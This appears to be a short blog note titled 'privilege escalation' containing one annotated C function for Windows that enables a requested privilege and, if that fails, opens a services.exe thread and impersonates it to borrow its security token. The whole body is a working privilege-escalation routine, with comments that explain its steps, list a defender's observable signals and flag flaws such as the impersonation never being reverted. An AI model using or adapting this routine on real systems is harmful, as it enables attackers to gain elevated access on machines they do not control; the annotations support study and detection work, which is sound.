@FadeTrack 2017-05-24T16:11:48.000000Z 字数 1443 阅读 1910




提权:

  // Enables one privilege (a privilege value as accepted by RtlAdjustPrivilege)
  // for the caller.
  // Strategy visible in the body: first try RtlAdjustPrivilege against the
  // process token, then against the current thread's token; if both fail,
  // open the first thread of "services.exe", make the calling thread
  // impersonate it, and retry against that impersonation token.
  // Returns TRUE when one of the RtlAdjustPrivilege calls succeeded, FALSE
  // otherwise (failures on the fallback path are reported via DbgPrint).
  // Side effect to be aware of: when the impersonation path is taken, the
  // calling thread is left impersonating after this function returns — there
  // is no revert call anywhere in the block.
  // Defender's note: the observable actions of the fallback path are a thread
  // handle opened with THREAD_DIRECT_IMPERSONATION on a services.exe thread,
  // followed by NtImpersonateThread on the calling thread.
  BOOL GetPrivilege(ULONG Priviliage)
  {
      BOOL bRet = FALSE;
      NTSTATUS St;      // only read after being assigned on the paths below
      BOOLEAN bEnable;  // previous enable state reported by RtlAdjustPrivilege; not used afterwards
      // RtlAdjustPrivilege(Privilege, Enable, CurrentThread, Enabled): the third
      // argument selects the process token (FALSE) or the current thread's
      // token (TRUE). Short-circuit: the second attempt only runs if the first failed.
      bRet = NT_SUCCESS(RtlAdjustPrivilege(Priviliage,TRUE,FALSE,&bEnable)) || NT_SUCCESS(RtlAdjustPrivilege(Priviliage,TRUE,TRUE,&bEnable));
      if (!bRet)
      {
          // GetSystemInformation() is a helper defined elsewhere; the free()
          // below implies it returns a malloc()-style buffer — confirm against
          // its definition.
          PSYSTEM_PROCESSES_INFORMATION Processes = (PSYSTEM_PROCESSES_INFORMATION)GetSystemInformation(SystemProcessInformation);
          if (Processes)
          {
              UNICODE_STRING ProcessName = RTL_CONSTANT_STRING(L"services.exe");
              // Walk the variable-length entries by NextEntryDelta bytes.
              // NOTE(review): the pointer is advanced through a ULONG alias,
              // which violates strict aliasing and is only correct where a
              // ULONG is as wide as a pointer.
              for (PSYSTEM_PROCESSES_INFORMATION Proc=Processes; ; *(ULONG*)&Proc += Proc->NextEntryDelta)
              {
                  // Case-insensitive comparison (third argument TRUE).
                  if (RtlEqualUnicodeString(&Proc->ProcessName,&ProcessName,TRUE))
                  {
                      HANDLE hThread;
                      OBJECT_ATTRIBUTES ObjAttr;
                      InitializeObjectAttributes(&ObjAttr,NULL,0,0,0);
                      // Opens the first thread record of the matching process;
                      // assumes the entry carries at least one thread — not checked here.
                      St = NtOpenThread(&hThread,THREAD_DIRECT_IMPERSONATION,&ObjAttr,&Proc->Threads[0].ClientId);
                      if (NT_SUCCESS(St))
                      {
                          // Impersonation level and context tracking mode requested
                          // for the impersonation below.
                          SECURITY_QUALITY_OF_SERVICE SecurityQos = {0};
                          SecurityQos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
                          SecurityQos.ImpersonationLevel = SecurityImpersonation;
                          SecurityQos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;
                          // The calling thread takes on the opened thread's security context.
                          St = NtImpersonateThread(NtCurrentThread(),hThread,&SecurityQos);
                          if (NT_SUCCESS(St))
                          {
                              // Retry against the current thread's (now impersonation) token.
                              St = RtlAdjustPrivilege(Priviliage,TRUE,TRUE,&bEnable);
                              bRet = NT_SUCCESS(St);
                              if (!bRet)
                              {
                                  DbgPrint(__FUNCTION__"(): RtlAdjustPrivilege failed with status %x\n",St);
                              }
                          }
                          else
                          {
                              DbgPrint(__FUNCTION__"(): NtImpersonateThread failed with status %x\n",St);
                          }
                          // The handle is closed either way; the impersonation, if it
                          // succeeded, stays in effect.
                          NtClose(hThread);
                      }
                      else
                      {
                          DbgPrint(__FUNCTION__"(): NtOpenThread failed with status %x\n",St);
                      }
                      // Only the first matching entry is considered.
                      break;
                  }
                  // A zero NextEntryDelta marks the last entry of the list.
                  if (!Proc->NextEntryDelta) break;
              }
              free(Processes);
          }
      }
      return bRet;
  }